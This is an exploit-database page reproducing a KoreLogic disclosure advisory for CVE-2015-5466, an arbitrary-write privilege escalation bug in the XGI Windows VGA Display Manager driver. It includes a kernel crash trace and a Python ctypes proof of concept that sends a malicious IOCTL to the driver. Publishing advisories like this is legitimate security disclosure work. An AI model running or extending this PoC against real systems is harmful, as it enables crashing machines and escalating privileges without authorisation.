0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt 1. Vulnerability Details Affected Vendor: Silicon Integrated Systems Corporation Affected Product: XGI VGA Display Manager Affected Version: 6.14.10.1090 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-5466 2. Vulnerability Description A vulnerability within the xrvkp module allows an attacker to inject memory they control into an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable resulting in an elevation of privilege. 3. Technical Description Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 50, {ffff0000, 1, 804f3b76, 0} Probably caused by : xrvkp.sys ( xrvkp+6ec ) Followup: MachineOwner --------- kd> kn Call stack: # ChildEBP RetAddr 00 f63fd9a0 8051cc7f nt!KeBugCheckEx+0x1b 01 f63fda00 805405d4 nt!MmAccessFault+0x8e7 02 f63fda00 804f3b76 nt!KiTrap0E+0xcc 03 f63fdad0 804fdaf1 nt!IopCompleteRequest+0x92 04 f63fdb20 806d3c35 nt!KiDeliverApc+0xb3 05 f63fdb20 806d3861 hal!HalpApcInterrupt+0xc5 06 f63fdba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11 07 f63fdbc8 804f07e4 nt!KeInsertQueueApc+0x4b 08 f63fdbfc f7b136ec nt!IopfCompleteRequest+0x1d8 09 f63fdc34 804ee129 xrvkp+0x6ec 0a f63fdc44 80574e56 nt!IopfCallDriver+0x31 0b f63fdc58 80575d11 nt!IopSynchronousServiceTail+0x70 0c f63fdd00 8056e57c nt!IopXxxControlFile+0x5e7 0d f63fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0e f63fdd34 7c90e514 nt!KiFastCallEntry+0xf8 0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 15 0021f6c0 1e07bd9c _ctypes+0x54d8 16 00000000 00000000 python27!PyObject_Call+0x4c 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2015.05.14 - Initial contact; requested security contact. 2015.05.18 - Second contact attempt. 2015.05.25 - Third contact attempt. 2015.07.02 - KoreLogic requests CVE from Mitre. 2015.07.10 - Mitre issues CVE-2015-5466. 2015.07.28 - 45 business days have elapsed since KoreLogic last attempted to contact SiS without a response. 2015.09.01 - Public disclosure. 7. Proof of Concept from sys import exit from ctypes import * NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory WriteProcessMemory = windll.kernel32.WriteProcessMemory DeviceIoControl = windll.ntdll.NtDeviceIoControlFile CreateFileA = windll.kernel32.CreateFileA CloseHandle = windll.kernel32.CloseHandle FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1 OPEN_EXISTING = 3 NULL = None device = "xgikp" code = 0x96002404 inlen = 0xe6b6 outlen = 0x0 inbuf = 0x1 outbuf = 0xffff0000 inBufMem = "\x90"*inlen def main(): try: handle = CreateFileA("\\\\.\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[-] error creating handle" exit(1) except Exception as e: print "[-] error creating handle" exit(1) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0))) DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,outbuf,outlen) CloseHandle(handle) return False if __name__=="__main__": main() The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ # 0day.today [2024-12-25] #